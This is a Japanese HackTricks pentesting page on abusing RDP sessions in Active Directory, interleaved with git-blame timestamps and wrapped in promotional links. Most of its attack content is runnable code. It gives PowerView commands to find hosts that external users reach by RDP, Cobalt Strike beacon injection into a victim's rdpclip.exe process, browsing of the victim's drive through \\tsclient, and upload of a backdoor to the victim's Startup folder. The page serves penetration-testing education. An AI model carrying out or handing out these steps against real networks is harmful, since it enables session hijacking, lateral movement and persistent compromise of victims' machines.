2023-07-07 23:42:27 +00:00
|
|
|
|
# RDPセッションの悪用
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## RDPプロセスのインジェクション
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
もし**外部グループ**が現在のドメイン内の**任意のコンピュータ**に**RDPアクセス**を持っている場合、**攻撃者はそのコンピュータを侵害し、待機することができます**。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
ユーザーがRDP経由でアクセスした後、**攻撃者はそのユーザーのセッションに移行し、外部ドメインでの権限を悪用**することができます。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
```powershell
|
|
|
|
|
|
# Supposing the group "External Users" has RDP access in the current domain
|
|
|
|
|
|
## lets find where they could access
|
|
|
|
|
|
## The easiest way would be with bloodhound, but you could also run:
|
|
|
|
|
|
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
|
|
|
|
|
|
#or
|
|
|
|
|
|
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
|
|
|
|
|
|
|
|
|
|
|
|
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
|
|
|
|
|
|
net logons
|
|
|
|
|
|
Logged on users at \\localhost:
|
|
|
|
|
|
EXT\super.admin
|
|
|
|
|
|
|
|
|
|
|
|
# With cobalt strike you could just inject a beacon inside of the RDP process
|
|
|
|
|
|
beacon> ps
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PID PPID Name Arch Session User
|
|
|
|
|
|
--- ---- ---- ---- ------- -----
|
|
|
|
|
|
...
|
|
|
|
|
|
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
beacon> inject 4960 x64 tcp-local
|
|
|
|
|
|
## From that beacon you can just run powerview modules interacting with the external domain as that user
|
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
他のツールを使用してセッションを盗む**他の方法については、[このページ](../../network-services-pentesting/pentesting-rdp.md#session-stealing)を参照してください。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
## RDPInception
|
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**攻撃者が待ち構えているマシン**にユーザーが**RDP経由でアクセス**する場合、攻撃者は**ユーザーのRDPセッションにビーコンを注入**することができ、**被害者がRDP経由でドライブをマウント**した場合、**攻撃者はそれにアクセス**することができます。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
この場合、**元のコンピュータ**に**バックドア**を**スタートアップフォルダ**に書き込むことで、**被害者のコンピュータを侵害**することができます。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
```powershell
|
|
|
|
|
|
# Wait til someone logs in:
|
|
|
|
|
|
net logons
|
|
|
|
|
|
Logged on users at \\localhost:
|
|
|
|
|
|
EXT\super.admin
|
|
|
|
|
|
|
|
|
|
|
|
# With cobalt strike you could just inject a beacon inside of the RDP process
|
|
|
|
|
|
beacon> ps
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PID PPID Name Arch Session User
|
|
|
|
|
|
--- ---- ---- ---- ------- -----
|
|
|
|
|
|
...
|
|
|
|
|
|
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
beacon> inject 4960 x64 tcp-local
|
|
|
|
|
|
|
|
|
|
|
|
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
|
|
|
|
|
|
## \\tsclient\c is the C: drive on the origin machine of the RDP session
|
|
|
|
|
|
beacon> ls \\tsclient\c
|
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Size Type Last Modified Name
|
|
|
|
|
|
---- ---- ------------- ----
|
|
|
|
|
|
dir 02/10/2021 04:11:30 $Recycle.Bin
|
|
|
|
|
|
dir 02/10/2021 03:23:44 Boot
|
|
|
|
|
|
dir 02/20/2021 10:15:23 Config.Msi
|
|
|
|
|
|
dir 10/18/2016 01:59:39 Documents and Settings
|
|
|
|
|
|
[...]
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
# Upload backdoor to startup folder
|
|
|
|
|
|
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
|
|
|
|
|
beacon> upload C:\Payloads\pivot.exe
|
|
|
|
|
|
```
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
